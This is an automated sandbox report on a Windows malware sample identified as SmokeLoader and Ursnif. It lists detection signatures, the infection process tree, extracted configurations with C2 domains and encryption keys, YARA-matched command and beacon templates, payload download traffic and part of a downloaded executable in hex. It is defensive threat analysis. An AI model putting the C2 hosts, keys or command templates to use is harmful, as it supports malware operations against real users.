Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cqu7x.exe

Overview

General Information

Sample Name:cqu7x.exe
Analysis ID:743908
MD5:e449924b8aa04fa2e032511cf86d2482
SHA1:bc9c00e0841a84fbc45d9ef36422eac3590b590f
SHA256:b9fd7622c3fcfdd6eb9b2cb917a3cb64eb35c61221de4866303ca88d828d5bed
Infos:

Detection

Ursnif, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Writes registry values via WMI
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cqu7x.exe (PID: 1924 cmdline: C:\Users\user\Desktop\cqu7x.exe MD5: E449924B8AA04FA2E032511CF86D2482)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 3196.exe (PID: 5156 cmdline: C:\Users\user\AppData\Local\Temp\3196.exe MD5: 969DB79BF21624D4135B30DF17777ABA)
  • vcivdjd (PID: 5384 cmdline: C:\Users\user\AppData\Roaming\vcivdjd MD5: E449924B8AA04FA2E032511CF86D2482)
  • cleanup
{"RSA Public Key": "srPNiXjpv7wJ4ljQO2Cz+d/1vQBpygFC+rxzA2ZfCG08A38OH/syLbdWurZUpeEopKx867ngBKiBCYKNKuEDO5TdpRu4icgODSbD5/RNGSb+8EPLgpbbUWScIJhsIrETgOb66YOp+zXevxRZPgG4/Be11WPFR9E0BCGig1wWjBqPcgDkZrDVTybbNAiB7WBjbG26Z+ggDYdJguf/gj1lSfHj+pVn5ZXxO1AaPWJ6kcSiCUWT5R2TFH550ig+/ppqRx4AuhLwYOZC0vaWmmGmwIQY5kixhB7e1gjnjAY57OHcecvOgqGpesvGL4Tg09kRioFbkNzrDQj66EB4YZ2LyeusAf9F2LccLOvlZsjgV04=", "c2_domain": ["telemetry.skype.com", "spotuoyoliusdd.ru", "sspotuoyobermanoba4.ru", "gdospotuoyluiprada8.ru", "messpotuoyoosd.ru", "klspotuoyka93hhu8.ru", "chespotuoynedr.ru"], "botnet": "15072022", "server": "50", "serpent_key": "NAyL8tmsHrJ4ZWxJ", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
{"C2 list": ["http://klenoviycdesss.ru/", "http://pali44unkis9.ru/", "http://goalichkindomik.ru/"]}
SourceRuleDescriptionAuthorStrings
00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x384:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 16 entries
      SourceRuleDescriptionAuthorStrings
      4.2.vcivdjd.4d0e50.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0.3.cqu7x.exe.520000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          4.2.vcivdjd.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                Timestamp:192.168.2.437.140.192.15849695802851815 11/11/22-12:22:52.606242
                SID:2851815
                Source Port:49695
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: cqu7x.exeReversingLabs: Detection: 92%
                Source: cqu7x.exeMetadefender: Detection: 40%Perma Link
                Source: http://dindunketagestan.ru/Avira URL Cloud: Label: malware
                Source: http://klenoviycdesss.ru/Avira URL Cloud: Label: malware
                Source: http://goalichkindomik.ru/Avira URL Cloud: Label: malware
                Source: http://pali44unkis9.ru/Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                Source: C:\Users\user\AppData\Roaming\vcivdjdAvira: detection malicious, Label: TR/AD.GenSHCode.nsnoi
                Source: C:\Users\user\AppData\Local\Temp\3196.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeReversingLabs: Detection: 88%
                Source: C:\Users\user\AppData\Roaming\vcivdjdReversingLabs: Detection: 92%
                Source: C:\Users\user\AppData\Roaming\vcivdjdMetadefender: Detection: 40%Perma Link
                Source: cqu7x.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\3196.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\vcivdjdJoe Sandbox ML: detected
                Source: 6.2.loader_250246_15072022_2203_31102022.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: 5.2.3196.exe.2aed320.1.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 6.0.loader_250246_15072022_2203_31102022.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: 4.0.vcivdjd.400000.0.unpackAvira: Label: TR/AD.GenSHCode.nsnoi
                Source: 0.0.cqu7x.exe.400000.0.unpackAvira: Label: TR/AD.GenSHCode.nsnoi
                Source: 5.2.3196.exe.2ae3f04.0.unpackAvira: Label: TR/Patched.Ren.Gen4
                Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://klenoviycdesss.ru/", "http://pali44unkis9.ru/", "http://goalichkindomik.ru/"]}
                Source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "srPNiXjpv7wJ4ljQO2Cz+d/1vQBpygFC+rxzA2ZfCG08A38OH/syLbdWurZUpeEopKx867ngBKiBCYKNKuEDO5TdpRu4icgODSbD5/RNGSb+8EPLgpbbUWScIJhsIrETgOb66YOp+zXevxRZPgG4/Be11WPFR9E0BCGig1wWjBqPcgDkZrDVTybbNAiB7WBjbG26Z+ggDYdJguf/gj1lSfHj+pVn5ZXxO1AaPWJ6kcSiCUWT5R2TFH550ig+/ppqRx4AuhLwYOZC0vaWmmGmwIQY5kixhB7e1gjnjAY57OHcecvOgqGpesvGL4Tg09kRioFbkNzrDQj66EB4YZ2LyeusAf9F2LccLOvlZsjgV04=", "c2_domain": ["telemetry.skype.com", "spotuoyoliusdd.ru", "sspotuoyobermanoba4.ru", "gdospotuoyluiprada8.ru", "messpotuoyoosd.ru", "klspotuoyka93hhu8.ru", "chespotuoynedr.ru"], "botnet": "15072022", "server": "50", "serpent_key": "NAyL8tmsHrJ4ZWxJ", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: cqu7x.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\cqu7x.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb8hC source: cqu7x.exe, vcivdjd.1.dr
                Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb source: cqu7x.exe, vcivdjd.1.dr

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: dindunketagestan.ru
                Source: C:\Windows\explorer.exeDomain query: kukaryka.ru
                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49695 -> 37.140.192.158:80
                Source: Malware configuration extractorURLs: http://klenoviycdesss.ru/
                Source: Malware configuration extractorURLs: http://pali44unkis9.ru/
                Source: Malware configuration extractorURLs: http://goalichkindomik.ru/
                Source: Joe Sandbox ViewASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: application/x-msdos-programContent-Length: 177152Connection: keep-aliveLast-Modified: Sun, 06 Nov 2022 19:06:18 GMTETag: "2b400-5ecd200734c2c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2c 79 63 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 08 01 00 00 aa 01 00 00 00 00 00 c1 26 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 77 26 01 00 4a 00 00 00 00 40 01 00 e4 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c7 06 01 00 00 20 00 00 00 08 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 a7 01 00 00 40 01 00 00 a8 01 00 00 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 26 01 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 64 4b 00 00 0b 00 00 00 09 00 00 06 24 8b 00 00 53 9b 00 00 40 3f 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 17 2a 00 0a 17 2a 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38 50 00 00 00 2b 2a 7e 37 00 00 04 2b 4d 2b 4e 2b 4f 2b 57 2b 5b 1f 30 25 2c 09 32 09 2b 58 16 2d f0 1f 39 31 04 16 0b de 1d 09 16 2d f9 17 58 0d 09 7e 39 00 00 04 08 28 9d 00 00 06 17 2c e4 32 c5 17 25 2c ba 2a 07 2a 02 38 ab ff ff ff 0c 38 aa ff ff ff 0d 38 aa ff ff ff 08 2b b0 09 2b af 28 9a 00 00 06 38 a7 ff ff ff 0a 38 a3 ff ff ff 06 38 9f ff ff ff 06 2b a5 00 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38 50 00 00 00 2b 2a 7e 37 00 00 04 2b 4d 2b 4e 2b 4f 2b 57 2b 5b 1f 30 25 2c 09 32 09 2b 58 16 2d f0 1f 39 31 04 16 0b de 1d 09 16 2d f9 17 58 0d 09 7e 39 00 00 04 08 28 9d 00 00 06 17 2c e4 32 c5 17 25 2c ba 2a 07 2a 02 38 ab ff ff ff 0c 38 aa ff ff ff 0d 38 aa ff ff ff 08 2b b0 09 2b af 28 9a 00 00 06 38 a7 ff ff ff 0a 38 a3 ff ff ff 06 38 9f ff ff ff 06 2b a5 00 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rocmdbvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: dindunketagestan.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://froxojju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: dindunketagestan.ru
                Source: global trafficHTTP traffic detected: GET /iTunesHelper.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kukaryka.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quvycqdb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: dindunketagestan.ru
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 37 0d 0a 03 00 00 00 6f 77 a2 0d 0a 30 0d 0a 0d 0a Data Ascii: 7ow0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 32 66 0d 0a 00 00 c7 1f f0 9f 73 69 1b 62 99 0f 82 1d ee d6 67 70 f6 13 5b f9 f7 14 59 8f 9d 94 11 86 35 da 31 f2 b3 54 89 df 14 59 f4 30 77 7e 19 f3 d3 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fsibgp[Y51TY0w~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
                Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586272240.0000000000683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://telemetry.skype.com/drew/
                Source: explorer.exe, 00000001.00000000.351811387.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.385722347.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.412288858.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rocmdbvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: dindunketagestan.ru
                Source: unknownDNS traffic detected: queries for: dindunketagestan.ru
                Source: global trafficHTTP traffic detected: GET /iTunesHelper.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kukaryka.ru

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586083420.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                System Summary

                barindex
                Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.471661867.0000000000513000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.415096817.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.471455998.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.415328456.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: cqu7x.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
